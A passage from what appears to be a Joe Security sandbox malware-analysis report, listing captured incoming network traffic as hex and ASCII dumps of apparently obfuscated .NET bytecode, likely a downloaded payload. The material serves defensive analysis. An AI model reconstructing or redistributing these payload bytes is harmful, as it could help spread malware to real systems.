2022-02-22 14:30:32 UTC 10 IN Data Raw: 01 00 00 00 8d 01 00 00 01 fe 0e 03 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 03 00 00 01 25 fe 0e 05 00 fe 0e 0f 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 0d 00 fe 0e 04 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 00 00 a2 7f 52 00 00 04 fe 0e 06 00 fe 0c 06 00 fe 0e 11 00 fe 0c 11 00 fe 0e 10 00 00 fe 0c 0a 00 20 01 00 00 00 3b ea 02 00 00 fe 0c 11 00 fe 0e 10 00 fe 0c 11 00 46 fe 0e 0e 00 fe 0c 11 00 20 01 00 00 00 58 fe 0e 11 00 fe 0c 0e 00 20 01 00 00 00 3f 1d 01 00 00 fe 0c 0e 00 20 07 00 00 00 3d 0f 01 00 00 20 04 00 00 00 fe 0c 0e 00 3f 8a 00 00 00 20 04 00 00 00 fe 0c 0e 00 3d 05 00 00 00 38 a1 01 00 00 20 02 00 00 00 fe 0c 0e 00 3f 3e 00 00 00 20 02 Data Ascii: % % R ;F X ? = ? =8 ?>

2022-02-22 14:30:32 UTC 12 IN Data Raw: 00 00 00 38 2b 00 00 00 20 07 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 42 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 a1 fe ff ff fe 0c 05 00 fe 0c 09 00 d0 05 00 00 02 8c 13 00 00 01 a2 fe 0c 0d 00 fe 0c 09 00 20 04 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 38 6d fe ff ff fe 0c 0d 00 fe 0c 09 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 9a a5 13 00 00 01 7e 10 00 00 04 fe 0c 0c 00 fe 0c 02 00 58 4a 97 29 18 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 0e fe ff ff fe 0c 08 00 fe 0c 0c 00 fe 0c 02 00 58 4a fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 09 00 20 01 Data Ascii: 8+ ? =8B888 X8m Y Y Y~XJ) X8XJ Y X

2022-02-22 14:30:32 UTC 13 IN Data Raw: 01 00 fe 0c 01 00 39 13 00 00 00 28 01 00 00 2b fe 0e 00 00 38 14 00 00 00 38 0e 00 00 00 00 fe 09 00 00 fe 0e 00 00 38 01 00 00 00 00 fe 0c 00 00 2a 00 00 00 13 30 02 00 1a 00 00 00 1c 00 00 11 00 fe 09 01 00 fe 0d 00 00 fe 15 05 00 00 1b fe 0c 00 00 81 05 00 00 1b 00 2a 00 00 13 30 05 00 4e 02 00 00 1d 00 00 11 fe 0d 0f 00 25 20 01 00 00 00 54 46 fe 0e 03 00 fe 0c 03 00 20 04 00 00 00 5a fe 0e 0b 00 fe 0c 03 00 20 08 00 00 00 5a fe 0e 05 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 01 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0d 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 06 00 fe 0e 0e 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 02 00 fe 0c 02 00 20 00 00 00 00 fe 09 00 00 a2 7f 55 00 00 04 fe 0e 09 00 fe 0c 09 00 fe 0e 04 00 Data Ascii: 9(+888*0*0N% TF Z Z % U

2022-02-22 14:30:32 UTC 14 IN Data Raw: 00 fe 0c 0b 00 fe 0e 01 00 fe 0c 0b 00 46 fe 0e 09 00 fe 0c 0b 00 20 01 00 00 00 58 fe 0e 0b 00 fe 0c 09 00 20 01 00 00 00 3f ab 00 00 00 fe 0c 09 00 20 04 00 00 00 3d 9d 00 00 00 20 02 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 83 00 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 5c 00 00 00 38 56 00 00 00 38 51 00 00 00 20 03 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 7e 00 00 00 38 2b 00 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 13 ff ff ff fe 0c 06 00 fe 0c 0c 00 fe 0c 0e 00 fe 0c 0b 00 fe 0c 00 00 58 4a 9a a2 fe 0c 08 00 fe 0c 0c Data Ascii: F X ? = ?> =8 ? =8\8V8Q ? =8~8+ ? =8888XJ

2022-02-22 14:30:32 UTC 16 IN Data Raw: 00 3f 18 00 00 00 20 10 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 51 0d 00 00 38 65 01 00 00 38 60 01 00 00 20 13 00 00 00 fe 0c 27 00 3f 3e 00 00 00 20 13 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 23 0e 00 00 20 12 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a1 0d 00 00 38 19 01 00 00 38 14 01 00 00 20 14 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 14 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 1f 0e 00 00 38 ee 00 00 00 38 e9 00 00 00 20 18 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 18 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 df 16 00 00 20 16 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 16 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a0 0e 00 00 38 a2 00 00 00 20 17 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 17 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 c4 Data Ascii: ? '=8Q8e8` '?> '=8# '? '=888 '? '=888 '?d '=8 '? '=88 '? '=8

2022-02-22 14:30:32 UTC 17 IN Data Raw: 0c 0a 00 fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a 9a a2 fe 0c 15 00 fe 0c 0a 00 20 05 00 00 00 9c fe 0c 0a 00 20 01 00 00 00 58 fe 0e 0a 00 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 98 f7 ff ff fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a 74 09 00 00 1b 7e 15 00 00 04 fe 0c 21 00 fe 0c 18 00 58 4a 97 29 22 00 00 11 a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 39 f7 ff ff fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0e 0a 00 dd fa f6 ff ff fe 0c 19 00 fe 0c 21 00 fe 0c 18 00 58 4a 58 fe 0e 21 00 dd e2 f6 ff ff fe 0c 15 00 fe 0c 0a Data Ascii: !XJ X! X! Y Y Yt~!XJ)"! X!9!XJ Y! X! Y!XJX!

2022-02-22 14:30:32 UTC 18 IN Data Raw: fe 0c 13 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 24 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 fe 0c 26 00 fe 0c 24 00 fe 0c 1f 00 58 3c 16 00 00 00 fe 0c 24 00 fe 0c 26 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 23 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 13 00 38 5b ff ff ff 00 fe 0e 25 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 0e 00 fe 0c 0e 00 fe 0c 1d 00 3b bd 00 00 00 fe 0c 19 00 fe 0c 1d 00 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 0e 00 fe 0c 0e 00 20 ff ff ff ff 3b 78 00 00 00 Data Ascii: X [ XX ZXXJ$ XX ZX XXJ&$X<$&=8& X#8n Y8[% XX% ZX XXJ;X XXJ ;x

2022-02-22 14:30:32 UTC 20 IN Data Raw: 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 00 00 00 00 9c fe 0c 12 00 fe 0c 0a 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 39 f1 ff ff 00 fe 0c 11 00 fe 0c 19 00 59 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 00 fe 0c 23 00 58 3c 16 00 00 00 fe 0c 13 00 fe 0c 0b 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 1f 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 24 Data Ascii: Y @0 T9Y $$X [ XX ZXXJ XX ZX XXJ##X<=8& X8n Y$

TimestampkBytestransferred

Direction Data

Copyright Joe Security LLC 2022 Page 39 of 65

2022-02-22 14:30:32 UTC 21 IN Data Raw: 13 00 38 5b ff ff ff 00 fe 0e 26 00 fe 0c 19 00 20 a0 01 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0c 17 00 fe 0c 14 00 94 40 e8 fe ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 00 fe 0c 1d 00 fe 0e 05 00 00 fe 0c 05 00 20 ff ff ff ff 3b b4 01 00 00 00 fe 0c 0e 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 00 fe 0c 23 00 58 3c 16 00 00 00 fe 0c 13 00 fe 0c 0b 00 3d 1c 00 00 00 fe 0c 0d 00 38 Data Ascii: 8[& X& ZX XXJ@ X ; $$X [ XX ZXXJ XX ZX XXJ##X<=8

2022-02-22 14:30:32 UTC 22 IN Data Raw: 00 fe 0c 0e 00 20 01 00 00 00 3b b0 00 00 00 fe 0c 0e 00 20 02 00 00 00 3b 45 01 00 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c 14 00 fe 0c 16 00 9e fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 Data Ascii: ; ;EX XXJ Y YX XXJX!" X8.X XXJ Y

2022-02-22 14:30:32 UTC 24 IN Data Raw: 0c 27 00 3f d6 00 00 00 20 13 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 97 0e 00 00 20 10 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 10 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a6 09 00 00 20 0e 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 0e 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 b8 08 00 00 38 65 01 00 00 20 0f 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 ee 08 00 00 38 3f 01 00 00 38 3a 01 00 00 20 11 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 11 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 78 0d 00 00 38 14 01 00 00 20 12 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 7d 0d 00 00 38 ee 00 00 00 38 e9 00 00 00 20 16 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 16 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 c8 0e 00 00 Data Ascii: '? '=8 '?d '=8 '? '=88e '? '=88?8: '? '=8x8 '? '=8}88 '?d '=8

2022-02-22 14:30:32 UTC 25 IN Data Raw: 00 9e fe 0c 06 00 fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 0f 00 fe 0c 20 00 7a 00 00 dd 31 f8 ff ff 00 dd 2b f8 ff ff fe 0c 10 00 fe 0c 0a 00 fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a 9a a2 fe 0c 15 00 fe 0c 0a 00 20 05 00 00 00 9c fe 0c 0a 00 20 01 00 00 00 58 fe 0e 0a 00 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd e4 f7 ff ff fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a 74 09 00 00 1b 7e 16 00 00 04 fe 0c 21 00 fe 0c 18 00 58 4a 97 29 22 00 00 11 a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 85 f7 ff ff fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a fe 0c 10 00 fe 0c 0a 00 20 01 00 00 Data Ascii: X8 z1+!XJ X! X! Y Y Yt~!XJ)"! X!!XJ

2022-02-22 14:30:32 UTC 26 IN Data Raw: 00 20 01 00 00 00 59 fe 0e 24 00 38 5b ff ff ff 00 fe 0e 1d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 1d 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0e 05 00 20 ff ff ff ff fe 0c 07 00 3b 1e 03 00 00 fe 0c 11 00 fe 0c 07 00 3b ff 02 00 00 fe 0c 07 00 fe 0c 19 00 59 fe 0e 16 00 00 fe 0c 14 00 20 00 00 00 00 3b 17 01 00 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 16 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 Data Ascii: Y$8[ ?X ZX XXJ ;;Y ; Y $$X [ X ZXXJ X ZX XXJ#

2022-02-22 14:30:32 UTC 28 IN Data Raw: 00 dd b2 ed ff ff 20 00 00 00 00 fe 0e 0a 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 22 00 fe 0c 14 00 9a fe 0e 20 00 fe 0c 20 00 14 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 06 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 00 00 00 00 9c fe 0c 12 00 fe 0c 0a 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 32 f1 ff ff 00 fe 0c 11 00 fe 0c 19 00 59 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe Data Ascii: Y" ;O ;I Y @0 T2Y $$X [ ?X ZXXJ ?X ZX XXJ

2022-02-22 14:30:32 UTC 29 IN Data Raw: fe 0e 1f 00 fe 0c 25 00 fe 0c 24 00 fe 0c 1f 00 58 3c 16 00 00 00 fe 0c 24 00 fe 0c 25 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 23 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 13 00 38 5b ff ff ff 00 fe 0e 26 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0c 17 00 fe 0c 14 00 94 40 e8 fe ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 00 fe 0c 1d 00 fe 0e 05 00 00 fe 0c 05 00 20 ff ff ff ff 3b b4 01 00 00 00 fe 0c 0e 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 005a 58 fe 0c 18 00 58 4a fe 0e Data Ascii: %$X<$%=8& X#8n Y8[& X& ZX XXJ@ X ; $$X [ ?X ZXXJ

2022-02-22 14:30:32 UTC 30 IN Data Raw: fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c 14 00 fe 0c 16 00 9e fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c Data Ascii: Y YX XXJX!" X8.X XXJ Y YX XXJX!"

2022-02-22 14:30:32 UTC 32 IN Data Raw: 08 00 00 38 2d 03 00 00 38 28 03 00 00 20 0b 00 00 00 fe 0c 17 00 3f 8a 00 00 00 20 0b 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 48 09 00 00 20 09 00 00 00 fe 0c 17 00 3f 3e 00 00 00 20 09 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 99 08 00 00 20 08 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 08 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 39 08 00 00 38 c0 02 00 00 38 bb 02 00 00 20 0a 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 0a 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 94 08 00 00 38 95 02 00 00 38 90 02 00 00 20 0d 00 00 00 fe 0c 17 00 3f 3e 00 00 00 20 0d 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 90 09 00 00 20 0c 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 0c 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 10 09 00 00 38 49 02 00 00 38 44 02 00 00 20 0e 00 00 00 fe 0c 17 00 3f 18 00 00 00 Data Ascii: 8-8( ? =8H ?> =8 ? =8988 ? =888 ?> =8 ? =88I8D ?

2022-02-22 14:30:32 UTC 33 IN Data Raw: 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 20 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 20 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a fe 0e 18 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 20 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 20 00 9e fe 0c 27 00 fe 0c 14 00 20 01 00 Data Ascii: Y X XXJX ' X8. X XXJ Y Y X XXJX '

Timestamp    kBytes transferred    Direction    Data

Copyright Joe Security LLC 2022 Page 40 of 65

2022-02-22 14:30:32 UTC 34 IN Data Raw: 0c 08 00 fe 0c 00 00 59 fe 0e 0e 00 20 00 00 00 00 fe 0e 20 00 20 02 00 00 00 fe 0e 18 00 fe 0c 20 00 fe 0c 18 00 58 20 02 00 00 00 5b fe 0e 25 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 fe 0c 16 00 58 4a fe 0e 22 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 fe 0c 0e 00 fe 0c 22 00 fe 0c 1a 00 58 3c 16 00 00 00 fe 0c 22 00 fe 0c 0e 00 3d 1c 00 00 00 fe 0c 25 00 38 26 00 00 00 fe 0c 25 00 20 01 00 00 00 58 fe 0e 20 00 38 6e ff ff ff fe 0c 25 00 20 01 00 00 00 59 fe 0e 18 00 38 5b ff ff ff 00 fe 0e 12 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 12 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 fe 0e 19 00 20 ff ff ff ff fe 0c 04 00 3b Data Ascii: Y X [% jX% ZXXJ" jX% ZX XXJ"X<"=%8&% X 8n% Y8[ jX ZX XXJ ;

2022-02-22 14:30:32 UTC 36 IN Data Raw: 5a fe 0c 1e 00 fe 0c 16 00 58 4a fe 0c 1e 00 20 08 00 00 00 58 fe 0c 16 00 58 4a 59 5a fe 0c 1e 00 20 08 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0c 00 00 58 fe 0e 1e 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0e 1b 00 dd 44 ee ff ff fe 0c 05 00 fe 0c 1b 00 14 a2 fe 0c 10 00 fe 0c 1b 00 20 05 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 58 fe 0e 1b 00 dd 19 ee ff ff fe 0c 02 00 fe 0c 1b 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 1b 00 20 02 00 00 00 59 9a 74 0a 00 00 1b fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a fe 01 54 fe 0c 10 00 fe 0c 1b 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 59 fe 0e 1b 00 dd b8 ed ff ff fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 fe 0c 1e 00 fe 0c 16 00 58 4a 54 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c Data Ascii: ZXJ XXJYZ XXJXX YD X Y Yt YT Y YXJT

2022-02-22 14:30:32 UTC 37 IN Data Raw: 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 8b 00 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 00 00 00 00 fe 0e 1b 00 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe Data Ascii: ' X8.X XXJ Y YX XXJX' X8X XXJ X X

2022-02-22 14:30:32 UTC 38 IN Data Raw: 00 5a 58 fe 0e 1e 00 dd d0 e3 ff ff fe 0e 06 00 fe 0c 1f 00 20 01 00 00 00 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 04 e8 ff ff 00 fe 0c 08 00 fe 0c 00 00 59 fe 0e 1a 00 20 00 00 00 00 fe 0e 0f 00 20 02 00 00 00 fe 0e 0e 00 fe 0c 0f 00 fe 0c 0e 00 58 20 02 00 00 00 5b fe 0e 20 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 20 00 20 18 00 00 00 5a 58 fe 0c 16 00 58 4a fe 0e 18 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 20 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 25 00 fe 0c 1a 00 fe 0c 18 00 fe 0c 25 00 58 3c 16 00 00 00 fe Data Ascii: ZX ;O ;I' Y @0 TY X [ jX ZXXJ jX ZX XXJ%%X<

